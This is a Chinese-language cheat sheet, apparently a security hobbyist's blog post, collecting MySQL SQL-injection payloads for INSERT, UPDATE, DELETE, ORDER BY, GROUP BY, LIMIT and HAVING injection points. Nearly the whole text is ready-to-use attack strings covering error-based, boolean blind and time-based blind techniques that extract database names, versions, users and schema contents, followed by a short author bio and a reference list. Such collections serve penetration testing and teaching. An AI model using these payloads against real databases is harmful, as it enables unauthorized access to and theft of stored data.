Mysql 下 Insert、Update、Delete、Order By、Group By注入

Insert:

语法：INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)

报错注入：

insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');

insert into test(id,name,pass) values (6,'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');

盲注：

//根据or之间的表达式是否成立来进行盲注
'or 1=1 or ' //插入的测试语句直接当成sql语句执行，并把存储返回值，表达式成立，返回结果为1
'or 1=2 or ' //表达式不成立，返回结果为0
' or exists(select * from information_schema.tables) or' //返回结果为1
aaa' or length(database())=11 or '//返回正确
aaa' or mid(database(),1,1)='t' or'//返回正确
aaa' or mid(database(),1,11)='test' or '//返回正确

insert into test(id,name,pass) values (2,'mis1',''or   ascii(mid(database(),1,1))=116 or'')

时间盲注：

insert into test(id,name,pass) values (2,'mis1',''or  if(mid(database(),1,1)='a',sleep(10),0) or'')

Update:

update test set pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or''WHERE id=2 and name='0';

update test set pass='baidu' or extractvalue(1,concat(0x7e,database())) or''WHERE id=2 and name='0';

Delete:

DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or'';

DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or'';

Order by:

order by [id]---【注入点】

 SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1  and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

order by [id] desc/asc  ---【注入点】

 SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))

　　

Limit 0,1：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

报错注入：

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' 

如果注入点不是报错的，还可以使用 time-based 的注入，payload 如下：

SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE 'w', BENCHMARK(5000000,SHA1(1)),5)))),1);

　　

Group by:

group by username --【注入点】

SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

　　

Having :

Having 1=1 --【注入点】

SELECT username FROM users WHERE isadmin = 0 GROUP BY username  having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

　

Mysql报错注入：

1、通过floor报错

and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

2、ExtractValue

and extractvalue(1, concat(0x5c,(select user())))

3、UpdateXml

and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、利用NAME_CONST注入

and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、join报错注入

mysql> select *  from(select * from users a join users b)c;
mysql> select *  from(select * from users a join users b using(id))c;

mysql> select *  from(select * from users a join users b using(id,name))c;

Mysql盲注：

#select * from test where id =2 and length(version())=6
#select * from test where id =2 and ascii(substring(version(),7,1))>1

#select * from test where id =2 and length(database())=4
#select * from test where id =2 and ascii(mid(database(),4,1))=116

#select * from test where id =2 and (select length(version()))=6 
#select * from test where id =2 and (select count(*) from test)=3

Mysql时间盲注：

#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)

#select * from test where id =2 and if(substring(user(),1,1)='r',sleep(5),0)
#select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)

关于我：一个网络安全爱好者，致力于分享原创高质量干货，欢迎关注我的个人微信公众号：Bypass--，浏览更多精彩文章。

参考资料：

1、 Mysql报错注入原理分析(count()、rand()、group by)

2、关于Mysql注入过程中的五种报错方式及具体利用案例

3、利用insert，update和delete注入获取数据

4、Testing Injection

5、MySQL注入总结